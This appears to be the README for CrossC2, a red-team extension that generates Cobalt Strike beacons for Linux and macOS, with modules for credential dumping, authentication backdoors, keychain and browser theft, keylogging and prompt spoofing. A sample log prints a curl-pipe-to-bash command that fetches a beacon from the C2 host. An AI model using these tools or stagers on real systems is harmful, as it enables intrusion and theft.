🚀 更快捷的生成方式,参见 cna 介绍 GO📌
🔥 Linux & MacOS 支持无文件落地从内存中加载执行 动态库 或 可执行文件 GO📖
🔥 灵活自定义执行文件的数据返回类型,端口扫描, 屏幕截图, 键盘记录, 口令凭证 等用户自定义开发实现更便捷 GO📖 ( 样例: GO📌 )
🔥 自定义通信协议 GO📖
🔥 现已支持横向移动 [GO📌](#横向移动: 使用方法)
🎉 Android & iPhone 支持 GO📌
▄████▄ ██▀███ ▒█████ ██████ ██████ ▄████▄ ██████▄
▒██▀ ▀█ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▒██ ▒ ▒██▀ ▀█ ██░
▒▓█ ▄ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ░ ▓██▄ ▒▓█ █████▒
▒▓▓▄ ▄██▒▒██▀▀█▄ ▒██ ██░ ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄█ ░▒██
▒ ▓███▀ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██████▒▒ ▒ ▓███▀ ░▒▓█████▓
░ ░▒ ▒ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░ ░ ░▒ ▒ ░▒ ░▓ ░░
░ ▒ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░ ░▒ ░ ░ ░ ▒ ░ ░░ ░
░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ CrossC2 v2.0 @hook
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
仅做企业、组织内部自身使用,本框架具有一定脆弱性,非专业人员请勿使用,以及禁止用于非法用途及盈利等,否则造成经济损失等问题自行承担并追究其相关责任!
Windows | Linux | MacOS | iOS | Android | Embedded | |
---|---|---|---|---|---|---|
Run Env (x86) | √ | |||||
Run Env (x64) | √ | √ | √ | |||
gen beacon (x86) | √ | √ | ||||
gen beacon (x64) | √ | √ | ||||
gen beacon (armv7) | ⍻ | √ | ||||
gen beacon (arm64) | √ | √ | ||||
gen beacon (mips[el]) | ⍻ |
受限说明:
下载基础文件:
(如果操作系统是Windows, 下载genCrossC2.Win.exe)
Script Manager
,添加CrossC2.cna
(如果成功安装,菜单栏会多出一项 CrossC2
)CrossC2.cna
脚本中genCC2
路径为真实路径
77: $genCC2 = "/xxx/xx/xx/genCrossC2.MacOS"; # <-------- fix
建立listener与拷贝key:
因为一些原因,目前强制只支持HTTPS beacon。
复制server上cs目录下的 .cobaltstrike.beacon_keys
到本地目录下
采用内存无落地加载方式,支持动态库(.so/.dylib)以及可执行文件(ELF/MachO)。
⚠️: 虽然文件是直接从内存加载的,但选用可执行文件的方式在传入参数时,进程是可以在ps中查看到的,不过进程名可以自定义。
执行时输出信息的类型可以自由指定,已预定了返回类型,可对接CS原生的返回数据类型。
⚠️: 关于特殊的数据类型,如密码,端口扫描结果等,请参照cs原生功能返回的信息编写,将按照正则匹配。
密码dump模块:cc2_mimipenguin 采用开源项目 MimiPenguin2.0,参见 CrossC2Kit/mimipenguin/mimipenguin.cna
认证后门模块:cc2_auth, cc2_ssh sudo/su/passwd等认证后门,ssh被连接及连接其他主机的凭证都将被记录。
信息收集模块:cc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump 常见浏览器的访问记录,以及iMessage聊天内容与钥匙串中保存的认证凭据都将被获取。
流量代理模块:cc2_frp 支持快速TCP/KCP(UDP)的反向socks5加密流量代理。
键盘记录模块:cc2_keylogger 记录用户的键盘输入。
网络探测模块:cc2_portscan, cc2_serverscan 进行端口扫描及服务版本扫描。
权限提升模块:cc2_prompt_spoof 诱导欺骗获取用户账户密码。
任务管理模块:cc2_job 管理内存中运行的模块。
...
可以更便捷的实现C2Profile配置及自定义通信协议TCP/UDP等等。
Linux-bind
/ MacOS-bind
类型的beacon./MacOS-bind.beacon <port>
开启服务connect <targetIP>:<port>
菜单栏: CrossC2 -> CrossC2 Payload Generator -> genCrossC2
弹出的对话框中可以配置:
1. 选择beacon_key(路径中不可以包含空格,该问题暂时未解决)
2. 需要给beacon绑定的自定义通信协议动态库
3. Payload类型(Staged生成的shellcode需要stagerServer)
生成时信息状态会在event界面中提示
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] : Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64: curl -A o -o- -L http://172.16.251.1:55413/a | bash -s
开发动态库,自定义数据返回类型,例如实现一些内置功能。
md5(genCrossC2.Linux) = 221b3ede4e78fee80f59946f116d7245
md5(genCrossC2.MacOS) = d216cad3fe3c25ead46b85c7ad7051f1
md5(genCrossC2.Win.exe) = a573506e8825b46b041ac3b9307a656b
md5(genCrossC2.Linux) = 2ef7250cc3787d3cbd1e6f99c3c434aa
md5(genCrossC2.MacOS) = eaabde94dd7fed8dabb37cd67a1171c4
md5(genCrossC2.Win.exe) = c65ac808ed3a1000b3ff4ebb8c48ea4e
md5(genCrossC2.Linux) = 2347ed6e30e4655b793a6dbb4d33d25c
md5(genCrossC2.MacOS) = f530333500a76fe228864f8901af4104
md5(genCrossC2.Win.exe) = c223e31b2674a8a11d3254f92259e87a
md5(genCrossC2.Linux) = 12295998d4bffd5b4c4a411fb33428bb
md5(genCrossC2.MacOS) = c88ce9df47529b243e2215a866d445c5
md5(genCrossC2.Win.exe) = 51d1814f1ebbab634bce0373ceb7cee6
md5(genCrossC2.Linux) = b2e34f721ec2543b6625e33c8c2935df
md5(genCrossC2.MacOS) = 4e38a9d9a3eeff309648afc02e2e7664
md5(genCrossC2.Linux) = 8256374d88c2149efc102aff7e90b3f9
md5(genCrossC2.MacOS) = 08fce0a5d964a091d8bf2344d7ab809e
md5(genCrossC2.Linux) = f4c0cc85c7cdd096d2b7febedc037538
md5(genCrossC2.MacOS) = 79fff0505092fc2055824ed1289ce8f9
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。